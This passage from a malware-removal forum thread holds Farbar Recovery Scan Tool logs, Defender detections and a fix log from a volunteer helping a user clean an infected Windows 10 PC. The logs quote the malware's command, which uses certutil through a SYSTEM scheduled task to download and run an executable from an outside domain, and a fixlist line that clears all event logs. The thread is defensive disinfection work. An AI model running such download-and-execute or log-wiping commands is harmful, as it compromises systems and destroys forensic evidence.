 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error:
Access is denied.

Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error:
Access is denied.

Error: (11/24/2019 07:12:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:11:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.


Windows Defender:
===================================
Date: 2019-11-24 19:12:13.754
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:12:11.511
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:55.432
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win32/Bomitag.D!ml
ID: 2147741007
Severity: Severe
Category: Trojan
Path: file:_C:\Program Files (x86)\Hadadn\68060836.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:39.663
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...14&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exeC:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:39.626
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...51&enterprise=0
Name: BrowserModifier:Win32/Neobar
ID: 225451
Severity: High
Category: Browser Modifier
Path: regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\csrss; regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\wup; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{291DB7AE-2C1B-4863-B103-F71CA48986BA}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckIE; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckU; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckUn; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program File
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================

Date: 2019-10-29 09:57:25.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-08-03 12:16:27.456
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-08 12:00:17.288
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-05-04 12:47:46.475
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-03-15 11:40:11.320
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-26 12:31:13.039
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 26%
Total physical RAM: 16331.55 MB
Available physical RAM: 12012.87 MB
Total Virtual: 16631.55 MB
Available Virtual: 10766.25 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:62.77 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:152.18 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS
Drive h: (Seagate Expansion Drive) (Fixed) (Total:1863.01 GB) (Free:921.95 GB) NTFS
Drive p: () (Fixed) (Total:5 GB) (Free:0.35 GB) exFAT

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Attached Files


  • 0

Advertisements


#2
RKinner

RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

Download the attached fixlist.txt to the same location as FRST



Run FRST and press Fix
A fix log will be generated please post that

Reboot if the fix doesn't reboot it for you

Run FRST again as before.  Make sure Addition.txt is checked and hit Scan.  Post both logs.

 

Attached Files


  • 0

#3
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

I ran FRST64 and rebooted. It did not reboot properly in windows 10. Started in DOS.BIOS (i don;t know, where my cordless mouse did not work, so I had to use only my keyboard
Finally I managed to start windows. Then I had problems connecting to google (they wanted to see if I am a robot, which I am not!) so they let me enter, and here I am.

I am not sure if I did something wrong but after rebooting and finding Fixlog.txt which I copy here and restarting FRST64 it says that "No fixlist.txt found" . I can't find any fixlist myself. Only fixlog which is in the same directory with FRST.  Anyway the fixlog.txt.is below. If you want me to repeat any steps please let me know.


Fix result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (25-11-2019 01:28:09) Run:1
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [GreenResonance] => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [7890540] => C:\Users\SR\AppData\Local\Temp\is-2HG9K.tmp\Guitar.exe [877745 2019-11-24] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-24] (EpicNet Inc.) [File not signed] <==== ATTENTION
Task: {B6C27676-7B71-492F-BB86-892E15752F97} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {C789D50A-A2A0-405F-B279-A59DBA0D126E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {42CF4929-54EE-42D2-B729-F538516C85C2} - System32\Tasks\JumpingBytes\PureSyncVSS => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncVSSStart.exe [35656 2016-06-16] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
Task: {DC559262-3918-4E5A-B027-44ED71265B49} - System32\Tasks\JumpingBytes\PureSyncExit => C:\Program Files (x86)\Jumping Bytes\PureSync\PureSyncAdmin.exe [105808 2018-11-12] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
FF Extension: (No Name) - C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi [2019-08-11] [not signed]
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246]
AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296]
FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File
FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]
FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
C:\Users\SR\AppData\Roaming\EpicNet
EmptyTemp:
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:


*****************

"HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GreenResonance" => removed successfully
"HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7890540" => removed successfully
"HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B6C27676-7B71-492F-BB86-892E15752F97}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B6C27676-7B71-492F-BB86-892E15752F97}" => removed successfully
C:\Windows\System32\Tasks\csrss => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C789D50A-A2A0-405F-B279-A59DBA0D126E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C789D50A-A2A0-405F-B279-A59DBA0D126E}" => removed successfully
C:\Windows\System32\Tasks\ScheduledUpdate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{42CF4929-54EE-42D2-B729-F538516C85C2}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42CF4929-54EE-42D2-B729-F538516C85C2}" => removed successfully
C:\Windows\System32\Tasks\JumpingBytes\PureSyncVSS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JumpingBytes\PureSyncVSS" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DC559262-3918-4E5A-B027-44ED71265B49}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DC559262-3918-4E5A-B027-44ED71265B49}" => removed successfully
C:\Windows\System32\Tasks\JumpingBytes\PureSyncExit => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JumpingBytes\PureSyncExit" => removed successfully
C:\Program Files\Mozilla Firefox\browser\features\{EBA45A79-A229-44D3-A606-3DADEAC6A066}.xpi => moved successfully
"HKLM\Software\MozillaPlugins\@itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd" => not found
C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll => moved successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd" => not found
"C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll" => not found
Winmon => Unable to stop service.
HKLM\System\CurrentControlSet\Services\Winmon => removed successfully
Winmon => service removed successfully
WinmonFS => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WinmonFS => removed successfully
WinmonFS => service removed successfully
WinmonProcessMonitor => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => removed successfully
WinmonProcessMonitor => service removed successfully
C:\Users\SR\AppData\Roaming\EpicNet Inc => moved successfully
"C:\Windows\system32\Tasks\csrss" => not found
C:\Program Files (x86)\Multitimer => moved successfully
C:\Program Files (x86)\Hadadn => moved successfully
C:\Windows\system32\ntkrnlmp.exe => moved successfully
C:\Windows\system32\osloader.efi => moved successfully
C:\Windows\system32\Drivers\WinmonProcessMonitor.sys => moved successfully
"C:\Windows\system32\Tasks\ScheduledUpdate" => not found
C:\Users\SR\AppData\Roaming\Microleaves => moved successfully
C:\Users\SR\AppData\Local\AdvinstAnalytics => moved successfully
C:\ProgramData\TEMP => ":907E90B1" ADS removed successfully
C:\Users\SR\AppData\Local\OPTvJO7k => ":lSGoicsydMwI75AardtQAZCSFhB" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CB2B1E04-1443-4466-A2D4-6FECE639BD29}" => removed successfully
"C:\Users\SR\AppData\Roaming\EpicNet" => not found

========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========

Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.

========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 12083200 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 484061940 B
Java, Flash, Steam htmlcache => 40572686 B
Windows/system/drivers => 90331588 B
Edge => 12057086 B
Chrome => 0 B
Firefox => 2325660479 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 6656 B
ProgramData => 6656 B
Public => 6656 B
systemprofile => 6656 B
systemprofile32 => 6656 B
LocalService => 15978 B
NetworkService => 20810984 B
SR => 256639629 B
Administrator => 256706531 B

RecycleBin => 0 B
EmptyTemp: => 3.3 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 01:34:52 ====


  • 0

#4
RKinner

RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

Run FRST again (make sure you have Addition.txt checked)  and hit SCAN.  You will get two logs please post both.

 

(Once you run a FRST Fix it automatically deletes the downloaded fixlist.txt.  Looks like you did it correctly.  Don't know why you had boot problems but might be because of the malware.)


  • 0

#5
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

Thank you. Sorry for the delay, but I had to sleep a few hours . It was night here.
The malware has stopped opening windows.
Here are the two logs.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-11-2019
Ran by SR (administrator) on DESKTOP-A0OS1Q6 (Gigabyte Technology Co., Ltd. To be filled by O.E.M.) (25-11-2019 10:21:27)
Running from D:\Users\SR\Downloads
Loaded Profiles: SR (Available Profiles: SR & Administrator)
Platform: Windows 10 Pro Version 1803 17134.345 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe
() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied)  [File not signed] C:\Windows\windefender.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Brio) [File not signed] C:\Program Files\FolderSize\FolderSizeSvc.exe
(Creative Labs Inc -> Creative Technology Ltd) C:\Windows\SysWOW64\CtHelper.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
(Dropbox, Inc -> Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(Dropbox, Inc -> The Qt Company Ltd.) C:\Program Files (x86)\Dropbox\Client\85.4.155\QtWebEngineProcess.exe
(EpicNet Inc.) [File not signed] C:\Users\SR\AppData\Local\Temp\csrss\cloudnet.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieCtrl.exe
(Invincea, Inc. -> Sandboxie Holdings, LLC) C:\Program Files\Sandboxie\SbieSvc.exe
(Logitech Inc -> Logitech) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOverlay.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\LogiOptions\LogiOptions.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech Inc -> Logitech, Inc.) C:\ProgramData\Logishrd\LogiOptions\Software\Current\LogiOptionsMgr.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.17920.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MusNotifyIcon.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1910.4-0\NisSrv.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
